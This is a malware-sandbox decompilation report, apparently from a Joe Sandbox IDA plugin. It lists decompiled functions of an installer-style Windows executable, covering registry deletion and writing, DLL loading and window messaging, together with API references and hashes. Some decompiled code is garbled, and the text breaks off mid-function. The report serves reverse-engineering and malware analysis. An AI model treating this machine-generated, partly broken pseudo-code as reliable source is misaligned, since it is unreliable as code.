Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: b5388fb2048f9adb4f66bcd81e9da03b2d8faafec29f08353259a6dacb87349b
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 0E014071D00219BADB00DB94DC45BEEBBB8AB59711F10016ABA11B61C0D7B865418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B3B(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x414b80; // 0x25600
					_t11 =  *0x428b90;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b48
0x00402b56
0x00402b5c
0x00402b5c
0x00402b6a
0x00402b6c
0x00402b72
0x00402b79
0x00402b7b
0x00402b7b
0x00402b91
0x00402ba1
0x00402bb3
0x00402bb3
0x00402bbb

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
MulDiv.KERNEL32(00025600,00000064,?), ref: 00402B81
wsprintfA.USER32 ref: 00402B91
SetWindowTextA.USER32(?,?), ref: 00402BA1
SetDlgItemTextA.USER32 ref: 00402BB3

Strings

verifying installer: %d%%, xrefs: 00402B8B

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: fb9d5c419c19e2bdb6c378f6819b1ebc1dc21d5e7d0f0b4f2b85ce684f360012
Instruction ID: 3d98ddf4d84b742d5460afe4edfb6d9be597fa80bf04213b3bc288f28cb5f5da
Opcode Fuzzy Hash: fb9d5c419c19e2bdb6c378f6819b1ebc1dc21d5e7d0f0b4f2b85ce684f360012
Instruction Fuzzy Hash: 82014470A40209ABDB209F60DD09FAE3779BB04345F008039FA06A92D1D7B8AA558F99

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00401F51(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ec18");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42ebe8 =  *0x42ebe8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E004029F6(0xfffffff0);
				 *(_t34 + 8) = E004029F6(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404DAA(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, 0x42f000, 0x40af80, "\xef\xbf\xb						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E004034F5(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f51
0x00401f51
0x00401f56
0x00401f5d
0x00402019
0x00402164
0x00402164
0x0040288b
0x0040288e
0x0040289a
0x0040289a
0x00401f6c
0x00401f76
0x00401f79
0x00401f88
0x00401f92
0x00401f96
0x00402012
0x00000000
0x00402012
0x00401f98
0x00401fa2
0x00401fa6
0x00401fea
0x00401fa8
0x00401fab
0x00401fae
0x00401fde
0x00401fb0
0x00401fb3
0x00401fbc
0x00401fbe
0x00401fbe
0x00401fbc
0x00401fae
0x00401ff2
0x00402007
0x00402007
0x00000000
0x00401ff2
0x00401f82
0x00401f86
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404DAA: lstrlenA.KERNEL32(004297B8,00000000,?,74D0EA30,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
Part of subcall function 00404DAA: lstrlenA.KERNEL32(00402FB6,004297B8,00000000,?,74D0EA30,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
Part of subcall function 00404DAA: lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,?,74D0EA30), ref: 00404E06
Part of subcall function 00404DAA: SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E3E
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E58
Part of subcall function 00404DAA: SendMessageA.USER32 ref: 00404E66

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402007

Strings

B, xrefs: 00401FC7

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: B
API String ID: 2987980305-3806887055
Opcode ID: 6d46612d3a10ff1fde0679903579df7a40cee65c269d183f8d6d4642c898af7f
Instruction ID: bf94c0598684f4a2e8798aed6ecd64900ad0f6fcd097f114c8a1beddd358b100
Opcode Fuzzy Hash: 6d46612d3a10ff1fde0679903579df7a40cee65c269d183f8d6d4642c898af7f
Instruction Fuzzy Hash: 5121EE72D04216EBCF107FA5CE49A6E75B06F45358F20433BF511B62E1C77C4941A65E

Uniqueness

Uniqueness Score: -1.00%

Function 00402A36 Relevance: 7.6, APIs: 5, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402A36(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x42ec10 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A36(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405D2E(2);
					if(_t27 == 0) {
						if( *0x42ec10 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x42ec10, 0);
				}
				return _t18;
			}

0x00402a57
0x00402a5f
0x00402a87
0x00402a71
0x00402ac1
0x00402ac7
0x00000000
0x00402ac9
0x00402a85
0x00000000
0x00000000
0x00402a85
0x00402a9c
0x00402aa4
0x00402aab
0x00402ad7
0x00000000
0x00000000
0x00402adf
0x00402ae7
0x00000000
0x00000000
0x00000000
0x00402ae7
0x00000000
0x00402aba
0x00402ace

APIs

RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A57
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A93
RegCloseKey.ADVAPI32(?), ref: 00402A9C
RegCloseKey.ADVAPI32(?), ref: 00402AC1
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402ADF

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: b26b43b9b7666f40e9fdb218fe96b22a79156d573bb7d5cc257a1d138f5a7564
Instruction ID: 324dab2b24170647655e9dcbeda369d8ff673eed47d89bab0de13a8960c84090
Opcode Fuzzy Hash: b26b43b9b7666f40e9fdb218fe96b22a79156d573bb7d5cc257a1d138f5a7564
Instruction Fuzzy Hash: 4F115675A00008FFEF31AF91DE49DAB7B6DEB40384B104436FA05B10A0DBB59E51AE69

Uniqueness

Uniqueness Score: -1.00%

Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}

0x00401ccb
0x00401cd2
0x00401d01
0x00401d09
0x00401d10
0x00401d10
0x0040288e
0x0040289a

APIs

GetDlgItem.USER32 ref: 00401CC5
GetClientRect.USER32 ref: 00401CD2
LoadImageA.USER32 ref: 00401CF3
SendMessageA.USER32 ref: 00401D01
DeleteObject.GDI32(00000000), ref: 00401D10

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 945e42f754af583b5ec13e30839ce2662c59fcb97218ebcfb2175b3756829da0
Instruction ID: f89edaf4e673e5a696cf4c500be88082f9c29b5fdabb6c66a10e118bddb835aa
Opcode Fuzzy Hash: 945e42f754af583b5ec13e30839ce2662c59fcb97218ebcfb2175b3756829da0
Instruction Fuzzy Hash: 71F01DB2E04105BFD700EBA4EE89DAFB7BDEB44345B104576F602F6190C678AD018B69

Uniqueness

Uniqueness Score: -1.00%

Function 00404597 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00404597(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405A2E(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405A2E(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405A2E(_t34, 0, 0x429fe0, 0x429fe0, _a8);
				wsprintfA(_t26 + lstrlenA(0x429fe0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x42e338, _a4, 0x429fe0);
			}

0x0040459f
0x004045a3
0x004045ab
0x004045ae
0x004045af
0x004045b1
0x004045b3
0x004045b6
0x004045b6
0x004045bd
0x004045c3
0x004045c3
0x004045ca
0x004045d5
0x004045d6
0x004045d9
0x004045d9
0x004045e6
0x004045f1
0x004045f4
0x00404606
0x0040460d
0x0040460e
0x0040461d
0x0040462d
0x00404649

APIs

lstrlenA.KERNEL32(00429FE0,00429FE0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004044B7,000000DF,0000040F,00000400,00000000), ref: 00404625
wsprintfA.USER32 ref: 0040462D
SetDlgItemTextA.USER32 ref: 00404640

Strings

%u.%u%s%s, xrefs: 0040460F

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 308c210494ba65c8d6c58fead7846ea59173cd15c70e93c8128561061e7c40a4
Instruction ID: a73c68329ee831a229c644748369bffc84c82a565a353c3d841dc2820e0c3950
Opcode Fuzzy Hash: 308c210494ba65c8d6c58fead7846ea59173cd15c70e93c8128561061e7c40a4
Instruction Fuzzy Hash: 9911D0737001243BDB10A66D9C46EEF329ADBC6334F14023BFA25F61D1E9388C5286E8

Uniqueness

Uniqueness Score: -1.00%

Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
windowtimeCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E0040596A();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}

0x00401bb6
0x00401bc2
0x00401bc5
0x00401bce
0x00401bce
0x00401bd1
0x00401bd5
0x00401bde
0x00401bde
0x00401be1
0x00401be5
0x00401be7
0x00401c34
0x00401c36
0x00401c3f
0x00401c47
0x00401c4a
0x00401c4a
0x00401c53
0x00000000
0x00401be9
0x00401bf0
0x00401bf2
0x00401bfa
0x00401bfd
0x00401c25
0x00401c59
0x00401c59
0x00401bff
0x00401c0d
0x00401c15
0x00401c18
0x00401c18
0x00401bfd
0x00401c5c
0x00401c5f
0x00401c65
0x00402833
0x00402833
0x0040288e
0x0040289a

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
SendMessageA.USER32 ref: 00401C25

Strings

!, xrefs: 00401BE1

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 5e77a80833e19dc55b8a20fadec5ab0659a97bc6c71de6bcb2193ca436d8299f
Instruction ID: e870f9960eb541ab862ab70d99fa676f0883abea00e9f1964bf1c40a5587cb5b
Opcode Fuzzy Hash: 5e77a80833e19dc55b8a20fadec5ab0659a97bc6c71de6bcb2193ca436d8299f
Instruction Fuzzy Hash: 3B21C4B1A44209BFEF01AFB4CE4AAAE7B75EF40344F14053EF602B60D1D6B84980E718

Uniqueness

Uniqueness Score: -1.00%

Function 004054FF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004054FF(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}

0x00405500
0x00405517
0x0040551f
0x0040551f
0x00405527

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 00405505
CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030E4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403244), ref: 0040550E
lstrcatA.KERNEL32(?,00409010), ref: 0040551F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004054FF

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3916508600
Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction ID: dfec000a3f5bf2671270dd29e8f8c50a5f72ee918dd093ba8f25731816a648b4
Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
Instruction Fuzzy Hash: FCD0A972705A307ED2022A19AC06F8F2A88CF17301B044822F100B62D2C23C9E418FFE

Uniqueness

Uniqueness Score: -1.00%

Function 00402303 Relevance: 6.1, APIs: 4, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00402303(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402AEB(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029F6(2);
				_t18 = E004029F6(0x11);
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x42ec10 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029F6(0x23);
						_t19 = lstrlenA(0x40a380) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029D9(3);
						 *0x40a380 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E5B( *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a380, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a380, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x42ebe8 =  *0x42ebe8 +  *(_t37 - 4);
				return 0;
			}

0x00402304
0x00402309
0x00402313
0x0040231d
0x00402320
0x0040233a
0x00402341
0x00402349
0x00402357
0x0040235b
0x00402366
0x00402366
0x0040236a
0x0040236e
0x00402374
0x00402379
0x00402379
0x0040237d
0x00402389
0x00402389
0x004023a2
0x004023a4
0x004023a4
0x004023a7
0x0040247d
0x0040247d
0x0040288e
0x0040289a

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402341
lstrlenA.KERNEL32(0040A380,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402361
RegSetValueExA.ADVAPI32(?,?,?,?,0040A380,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040239A
RegCloseKey.ADVAPI32(?,?,?,0040A380,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040247D

Memory Dump Source

Source File: 00000000.00000002.376208479.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.376119832.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376324958.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376354686.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.376799904.0000000000439000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_file.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID:
API String ID: 1356686001-0
Opcode ID: 81d27fc1e3ab509f11f0648c0d675ea1f801cb77e08bc1b8ef6c2a36b769e97e
Instruction ID: 74c2b7e5efa1a9b7d251dd878628ee018497e02546d33d1ea7114f4406d6c15c
Opcode Fuzzy Hash: 81d27fc1e3ab509f11f0648c0d675ea1f801cb77e08bc1b8ef6c2a36b769e97e
Instruction Fuzzy Hash: 721160B1E00209BFEB10AFA5DE89EAF767CFB40398F10453AF901B71D0D6B85D019669

Uniqueness

Uniqueness Score: -1.00%

Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
